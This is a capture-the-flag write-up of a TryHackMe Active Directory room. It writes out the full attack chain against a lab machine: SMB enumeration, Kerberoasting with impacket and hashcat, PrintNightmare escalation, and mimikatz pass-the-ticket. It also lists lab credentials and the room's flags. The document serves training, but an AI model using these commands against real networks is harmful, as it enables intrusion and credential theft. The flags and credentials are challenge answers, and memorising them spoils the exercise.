THM Enterprise V2
This is another TryHackMe Active Directory challenge.
Enumeration:
nmap -Pn -sV -sC 10.10.238.196
data:image/s3,"s3://crabby-images/79a1f/79a1fd3dfc565681ac981973b3ac106586592c7a" alt=""
Domain: Enterprise.thm
Computer Name: Lab-Enterprise
Enumeration of SMB shares.
smbclient -L \\10.10.238.196\
data:image/s3,"s3://crabby-images/a24fe/a24fe0d551a598bdc1ff2be80415fdfe897c6e50" alt=""
Connecting to the “Users” share.
smbclient \\10.10.238.196\Users\
data:image/s3,"s3://crabby-images/eeb92/eeb9244a33265ab396846f80a299cb90f094ef4c" alt=""
Spoiler, I didn’t want to go through the whole Git process because I only wanted to practice the AD stuff, so below are the creds.
nik:ToastyBoi!
Requesting SPN
impacket-GetUserSPNs -dc-ip 10.10.20.192 lab.enterprise.thm/nik:ToastyBoi! -request
data:image/s3,"s3://crabby-images/43424/43424dc3f9dfdf887acf9eb423347a7fa6db3a9b" alt=""
data:image/s3,"s3://crabby-images/92f07/92f079e0dc3cbf1e0329f0482c87f7a00885e184" alt=""
Using Hashcat to crack the hash.
hashcat -m 13100 hash_spn.txt /usr/share/wordlists/rockyou.txt
Credentials:
bitbucket:littleredbucket
RDP access using lab.enterprise.thm/bitbucket
data:image/s3,"s3://crabby-images/fbfdd/fbfdd3c7f469540e43f55ff3e85f7de1c182b1cb" alt=""
User: THM{ed882d0}
Privilege Escalation
Using Printnightmare to escalate privileges by creating a new local administrator account
data:image/s3,"s3://crabby-images/dd35f/dd35fb14ed842fc513b08d2177a6ae03b3e81067" alt=""
adm1n:P@ssw0rd
RDP access using adm1n account.
Copied mimikatz and dumped all account hashes, which then allowed to pass the ticket of the administrator.
sekurlsa::tickets /export
data:image/s3,"s3://crabby-images/7af58/7af58e3d46b3032ce0d00c871329ec23407c698b" alt=""
Selected the Administrator account ticket.
kerberos::ptt [0;5a168]-2-0-40e10000-Administrator@krbtgt-LAB.ENTERPRISE.THM.kirbi
Opened a new command prompt which allowed us to access the entire box.
misc::cmd
root: THM{1a1fa}